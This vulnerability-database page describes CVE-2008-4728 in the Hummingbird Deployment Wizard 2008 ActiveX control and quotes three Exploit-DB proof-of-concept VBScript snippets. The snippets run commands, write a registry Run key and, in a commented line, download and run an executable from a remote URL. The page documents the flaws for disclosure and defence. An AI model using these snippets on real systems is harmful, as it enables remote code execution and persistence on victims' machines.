CVE-2008-4728
published 2008-10-24CVE-2008-4728: Multiple insecure method vulnerabilities in the DeployRun.DeploymentSetup.1 (DeployRun.dll) ActiveX control 10.0.0.44 in Hummingbird Deployment Wizard 2008…
PriorityP357critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.63%
98.1th percentile
Multiple insecure method vulnerabilities in the DeployRun.DeploymentSetup.1 (DeployRun.dll) ActiveX control 10.0.0.44 in Hummingbird Deployment Wizard 2008 allow remote attackers to execute arbitrary programs via the (1) Run and (2) PerformUpdateAsync methods, and (3) modify arbitrary registry values via the SetRegistryValueAsString method. NOTE: the SetRegistryValueAsString method could be leveraged for code execution by specifying executable file values to Startup folders.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hummingbird | deployment_wizard | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change
exploitdb·2008-10-17
CVE-2008-4728 Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change
Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change
---
Hummingbird Deployment Wizard 2008 (DeployRun.dll) Registry Values Creation/Change
url: http://www.hummingbird.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Info:
DeployRun.dll
Sub tryMe
'test.SetRegistryValueAsString "Existing Registry Path + Existing Registry Key", "Value to change"
test.SetRegistryValueAsString "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourFavouriteKey", "Hello World!"
End Sub
# milw0rm.com [2008-10-17]
Exploit-DB
Hummingbird Deployment Wizard 2008 - ActiveX Command Execution
exploitdb·2008-10-17
CVE-2008-4728 Hummingbird Deployment Wizard 2008 - ActiveX Command Execution
Hummingbird Deployment Wizard 2008 - ActiveX Command Execution
---
Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution
url: http://www.hummingbird.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Info:
DeployRun.dll
Sub tryMe
test.Run "cmd.exe", "/C calc.exe"
End Sub
# milw0rm.com [2008-10-17]
Exploit-DB
Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)
exploitdb·2008-10-17
CVE-2008-4728 Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)
Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)
---
Hummingbird Deployment Wizard 2008 (DeployRun.dll) Arbitrary File Execution(2)
url: http://www.hummingbird.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Info:
DeployRun.dll
Sub tryMe
test.PerformUpdateAsync "calc.exe"
'test.PerformUpdateAsync "http://www.SomeSite.com/SomeFile.exe"
End Sub
# milw0rm.com [2008-10-17]
No writeups or analysis indexed.
http://secunia.com/advisories/32337http://www.securityfocus.com/bid/31799http://www.shinnai.net/xplits/TXT_2XfQ1sHruhjaoePszNTG.htmlhttp://www.shinnai.net/xplits/TXT_JqLchaIAfq4kSH0NsvJO.htmlhttp://www.shinnai.net/xplits/TXT_L0z0Mimixdsko8kI6VFW.htmlhttp://www.vupen.com/english/advisories/2008/2857https://exchange.xforce.ibmcloud.com/vulnerabilities/45961https://www.exploit-db.com/exploits/6773https://www.exploit-db.com/exploits/6774https://www.exploit-db.com/exploits/6776http://secunia.com/advisories/32337http://www.securityfocus.com/bid/31799http://www.shinnai.net/xplits/TXT_2XfQ1sHruhjaoePszNTG.htmlhttp://www.shinnai.net/xplits/TXT_JqLchaIAfq4kSH0NsvJO.htmlhttp://www.shinnai.net/xplits/TXT_L0z0Mimixdsko8kI6VFW.htmlhttp://www.vupen.com/english/advisories/2008/2857https://exchange.xforce.ibmcloud.com/vulnerabilities/45961https://www.exploit-db.com/exploits/6773https://www.exploit-db.com/exploits/6774https://www.exploit-db.com/exploits/6776
2008-10-24
Published